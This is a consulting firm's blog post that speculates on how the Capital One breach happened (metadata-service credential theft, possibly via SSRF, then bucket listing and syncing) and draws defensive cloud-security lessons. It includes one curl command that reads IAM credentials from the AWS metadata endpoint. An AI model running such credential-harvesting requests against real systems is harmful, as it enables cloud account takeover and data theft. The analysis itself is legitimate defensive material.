Insights

Blogs

Capital One data breach – what we can learn from the speculation

Despite the Capital One data breach having only being announced a few days ago, the Internet is rife with speculative details of the attack vectors the hacker may have used to exfiltrate the data.  While the true details still remain unconfirmed many of the theories contain very real threats which should be understood and dealt with, regardless of whether these were the actual vulnerabilities that were exploited.

The court filings indicate there were three main steps the attacker took:

  1. Obtain the credentials to access the S3 buckets containing the data
  2. List all of the S3 buckets available to those credentials
  3. Sync the data out of the S3 buckets

Let’s take a look at ways in which the attacker might have been able to perform these activities and how these activities could have been prevented.

Obtaining credentials

The AWS metadata service

All of the plausible theories include the exploitation of one important component – the AWS metadata service. This service is built into the hypervisor of all of the AWS servers and is responsible for handing out temporary credentials for accessing other AWS resources.  The beauty of this service is that, rather than AWS clients having to handle credentials (and all of the issues that come with it) we can grant resource A rights to resource B and the metadata service takes care of it.

STRONG DISCLAIMER: Capital One is not a client of Citihub Consulting and we have no inside knowledge of how this attack occurred. The information in this blog is based on our knowledge of using AWS and other publicly-available information.

One potential attack vector of the metadata service is that, if resource A (a VM) has rights to access another resource B (an S3 bucket), and a hacker is able to compromise resource A then all of that resource’s credentials can be obtained in plaintext using curl (curl http://169.254.169.254/iam/security-credentials).  Once those credentials had been hijacked they can be used from pretty much anywhere if there are no other controls in place (e.g. network ACL).

The IAM role being focused on is referred to in the FBI case as “*****-WAF-Webrole”, so the speculation is that this role was assigned to a Web Application Firewall (WAF), providing access to several hundred S3 buckets (either for logging purposes, or serving up static web content), and appears to have been overly broad in terms the buckets it had access to.

Metadata service hijack

Initial speculation, based on the “*****-WAF-Webrole” role name, was that a vulnerability in a WAF allowed the hacker to gain shell access to the device in order to query the metadata endpoint on the device’s hypervisor.  Whilst WAF vulnerability exploit is plausible, there is no information on the exact WAF being used.

An alternative vector is Server Side Request Forgery (SSRF).

SSRF is an attack vector whereby a server is used to proxy a connection to another site by modifying URLs in Web/API calls. More often than not it is a webhook that is exploited, which tells a server-side application to make a call to another URL for information.  SSRF is extremely difficult to detect without context of the application.

In this case, an application server behind the WAF may have been instructed to direct traffic to the WAF’s metadata service endpoint which then revealed the credentials back in the response. It is worth noting that an application server subject to an SSRF attack would need access to the “*****-WAF-Webrole” because it is not possible to query the metadata service endpoint on across different hosts. This would suggest another service was running on the WAF host or this role was used elsewhere in the environment.

In comparison to AWS, GCP requires a specific header to be provided to their equivalent service, which helps to protect against SSRF in cases where the attacker doesn’t have access to the full HTTP request.

Lessons:

  • Vulnerability Management: Vulnerabilities in web-facing components need to be handled ASAP. In the public cloud, with PaaS services, in particular, there may be more web-facing components than you realise.
  • Least Privilege: ensure that the roles assigned, in particular to vulnerable components, are restricted to only the resources it needs access to.
  • Role Re-Use: don’t re-use roles built for specific components on other, different components.
  • One Purpose per Host: don’t run several distinct services on the same host, as it results in that host having excessive privileges.
  • Control access to the IAM metadata service: as far as possible, prevent servers from proxying requests to the IAM metadata endpoint and block any requests coming through your firewall that include the metadata URL.

 “List” buckets

Once armed with credentials, the next activity the hacker performed was to list the buckets available to those credentials.

Web Application Firewalls don’t need to list buckets during the course of normal activity, so the ability to list buckets should not have been part of a role which supposedly was assigned to a WAF. This allowed the hacker to list all of the bucket names available to that role – over 700 buckets, according to the court filing.

The assumption that, once the credentials had been hijacked, the hacker accessed these buckets from outside of the Capital One VPC would point to the S3 buckets not having IP restrictions to limit access from specific areas of the Capital One network.

The hacker used VPN and TOR to cover her tracks, and CapitalOne confirmed that the network logs showed several access attempts from TOR exit nodes.  Whilst people use TOR for legitimate purposes, any access attempt (especially repeated attempts) should be highly suspicious.

Lessons:

  • Least privileged roles: Ensure assigned roles have only the features required to fulfil its duties (in this case, the list buckets command was not required for the WAF features) and only have access to the resources required for that function.
  • IP restrictions: Assume that resources can and will be accessed from outside of your VPC/VNets and restrict the networks that resources can be accessed from.
  • Use heuristics to identify normal vs abnormal: it’s likely that the “list” action on a large number of buckets was not normal activity for a user assuming the “WAF” role.
  • Constrain known exploitation channels: Decide whether TOR and VPN exit nodes should be considered legitimate locations for your clients to come from and manage accordingly.

“Sync” buckets

Finally, armed with credentials for accessing these buckets and the list of buckets accessible the hacker was able to make copies of the data.

Whilst some of the data fields were tokenized, the first question that springs to mind is, was the data encrypted?

Stay current on your favourite topics

Subscribe

Server-side encryption using AWS keys would not have protected against this attack because the requestor appeared as a genuine user, so the S3 service would have decrypted the data from disk transparently.

Had the data been server-side encrypted using Capital One’s keys then the credentials obtained by the hacker would have required access to the private keys hosted in the AWS Key Management Service (KMS).  It’s possible that the WAF was encrypting/decrypting using customer managed keys, in which case the “*****-WAF-Webrole” would’ve had an access token into KMS for one or more keys.  If the exfiltrated data had been encrypted then either these credentials had overly broad access to keys in the vault or encryption keys had been re-used across multiple buckets.

One challenge with customer-managed keys is that it makes the data pipeline significantly more complex to get right because each component in the pipeline needs appropriate permissions on the key store, so users are likely to choose the default options.  In this case, the data was parquet files for use in Redshift, so the application team may have considered the tokenizing of specific data fields a sufficient control to avoid managing customer managed keys across their data pipeline.

Finally, as with listing buckets, synchronizing entire buckets (unlikely touched for some time) from TOR and VPN exit points should have raised monitoring alerts.

Lessons:

  • CSP-managed encryption only gets you so far: If you appear with legitimate credentials to access the data it will be served up to you in plaintext, so consider customer-managed keys as the minimum bar for sensitive data.
  • Least privileged access to keys: overly broad access policies to key material compromises encryption, so constrain key access as tightly as possible.
  • Key re-use: Re-using keys across data sets or cross-purposes weakens encryption. Look at the key management processes and ensure that users aren’t re-using keys because provisioning and managing a large number of distinct keys is too cumbersome.
  • Egress monitoring and alerting: data egress of this kind, from these kinds of addresses, is not normal. The logs were captured showing this but the monitoring rules around them did not flag this to security operations teams. Review your logging and alerting rules regularly.
  • Audit all of your systems regularly: Capital One has reported that some of this data was collected back in 2016. Considering the public cloud ecosystem and our own learnings are maturing rapidly, public cloud systems should be audited on a very regular basis to ensure they are up to the latest standards. Whilst automated tools can do a great job (Capital One were responsible for open sourcing “Cloud Custodian”), manual spot checks should still be part of the operating model.
  • Practice defensible disposal: Questions are arising about why this data had not been disposed of, particularly in light of GDPR requirements.

Was this a development environment?

Given the overly broad privileges, reduced protection of sensitive data and lack of monitoring/alerting, it’s plausible that this was a non-production environment into which development teams had selectively tokenized copies of their production data, which otherwise was well protected in Production (possibly even inside Capital One’s data centre).

Lessons:

  • Treat Non-Production as Production: Developer productivity is a driving force behind the move to the cloud and overly strict controls are viewed as an affront to agility. Whilst strict controls can get in the way of certain development activities any non-production environments which contain sensitive data must be protected according to the data classification without compromising to the class of environment. In the world of “shift-left”, production controls should be exposed to development teams early in the test lifecycle.
  • Test Data Management: Building data sets that are representative of production is not an easy task and more often than not application teams will use obfuscated copies of production data. Regularly reviewing how copies of data for testing purposes are being obfuscated and protected and where copies are stored are important parts of every data owners’ responsibilities.  Consider treating test data as you would production data, because even obfuscated data may appear to be real, resulting in unflattering headlines.

Was it an inside job?

Whilst it is reported that the hacker had grievances against her former employer which may have provided motives for the attack, we think it is unlikely that her experiences working at AWS between 2015-2016 would have provided knowledge of vulnerabilities in the AWS platform which aren’t already publicly documented.

Summary

This was a very public exploit of a highly-visible champion of public cloud in the financial services industry and is likely to be a setback to many a public cloud programs.  The full nature of the vectors used in this attack are still to be revealed (if ever, although let’s hope Capital One makes the RCA publicly available), however the speculative theories alone have highlighted some very important “gotchas” that should be addressed at the front-and-center of every public cloud security program, not least management of identity and privileges.

As we touched on in our “PaaS challenges” article, given the porous nature of the network in the public cloud, effective identity and privilege management are your number one security tools. This exploit appears to have leveraged identity and privilege management weaknesses in both the AWS platform and at Capital One for which, ultimately, the industry as a whole will pay a price.


Useful Links:

The Netflix Tech Blog: Netflix Cloud Security: Detecting Credential Compromise in AWS

Evan J Blog: Preventing The Capital One Breach

Medium: Capital One, 100 Million People Data Breach: Technical Analysis

Hacker News: https://news.ycombinator.com/item?id=20560342

Reddit: Capitol One Breach on AWS


Citihub Consulting works with forward-thinking banks and large enterprises, helping to define and implement their digital transformation.


Author

Ian Tivey

Ian Tivey

Associate Partner, New York

Ian has a broad background across DevOps and Infrastructure disciplines in the design, build and operation of globally-distributed market data distribution and trading platforms. He currently leads Citihub Consulting’s Cloud Practice, having worked with clients in Europe, Asia, and North America to design and build hybrid cloud solutions in highly regulated banking environments.

ian.tivey@citihub.com